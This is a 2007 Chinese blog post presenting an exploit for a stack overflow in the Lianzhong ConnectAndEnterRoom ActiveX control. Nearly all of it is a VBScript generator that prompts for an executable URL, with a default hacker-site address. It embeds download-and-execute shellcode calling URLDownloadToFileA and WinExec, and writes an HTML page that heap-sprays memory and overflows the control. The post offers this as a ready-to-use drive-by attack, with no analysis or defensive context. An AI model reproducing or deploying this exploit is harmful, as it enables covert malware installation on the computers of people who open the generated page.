联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

    [多云 November 25, 2007 17:20 | by ]
来源:vbs空间
联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞


exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8b\x7e\x20\x03\xfb\x8b\x4e\x14\x33\xed\x56\x57\x51\x8b\x3f\x03\xfb\x8b\xf2\x6a\x0e\x59\xf3\xa6\x74\x08\x59\x5f\x83\xc7\x04\x45\xe2\xe9\x59\x5f\x5e\x8b\xcd\x8b\x46\x24\x03\xc3\xd1\xe1\x03\xc1\x33\xc9\x66\x8b\x08\x8b\x46\x1c\x03\xc3\xc1\xe1\x02\x03\xc1\x8b\x00\x03\xc3\x8b\xfa\x8b\xf7\x83\xc6\x0e\x8b\xd0\x6a\x04\x59\xe8\x6a\x00\x00\x00\x83\xc6\x0d\x52\x56\xff\x57\xfc\x5a\x8b\xd8\x6a\x01\x59\xe8\x57\x00\x00\x00\x83\xc6\x13\x56\x46\x80\x3e\x80\x75\xfa\x80\x36\x80\x5e\x83\xec\x40\x8b\xdc\xc7\x03\x63\x6d\x64\x20\x43\x43\x43\x43\x66\xc7\x03\x2f\x63\x43\x43\xc6\x03\x20\x43\x6a\x20\x53\xff\x57\xec\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x56\x50\xff\x57\xfc\x8b\xdc\x6a\x00\x53\xff\x57\xf0\x68\x51\x24\x40\x00\x58\xff\xd0\x33\xc0\xac\x85\xc0\x75\xf9\x51\x52\x56\x53\xff\xd2\x5a\x59\xab\xe2\xee\x33\xc0\xc3\xe8\x0c\xff\xff\xff\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74\x53\x79\x73\x74\x65\x6d\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6c\x6d\x6f\x6e\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65\x41\x00"&Unicode(exeurl&Chr(00)&Chr(00))
Function Unicode(str1)
Dim str,temp
str = ""
For i=1 to len(str1)
temp = Hex(AscW(Mid(str1,i,1)))
If len(temp) < 5 Then temp = right("0000"&temp, 2)
str = str & "\x" & temp
Next
Unicode = str
End Function
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("netpatch.htm",8,true)
fileS.writeline "<html>"
fileS.writeline "<object classid=""clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69"" id='target'></object>"
fileS.writeline "<body>"
fileS.writeline "<SCRIPT language=""JavaScript"">"
fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");"
fileS.writeline "var bigblock = unescape(""%u9090%u9090"");"
fileS.writeline "var headersize = 20;"
fileS.writeline "var slackspace = headersize+shellcode.length;"
fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;"
fileS.writeline "fillblock = bigblock.substring(0, slackspace);"
fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);"
fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;"
fileS.writeline "memory = new Array();"
fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;"
fileS.writeline "var buffer = '';"
fileS.writeline "while (buffer.length < 164) buffer+=""A"";"
fileS.writeline "buffer=buffer+""\x0a\x0a\x0a\x0a""+buffer;"
fileS.writeline "ok=""ok"";"
fileS.writeline "target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );"
fileS.writeline "</script>"
fileS.writeline "</body>"
fileS.writeline "</html>"files.Close
Set fso=nothing
msgbox "生成完毕!"
end if
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(10009)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive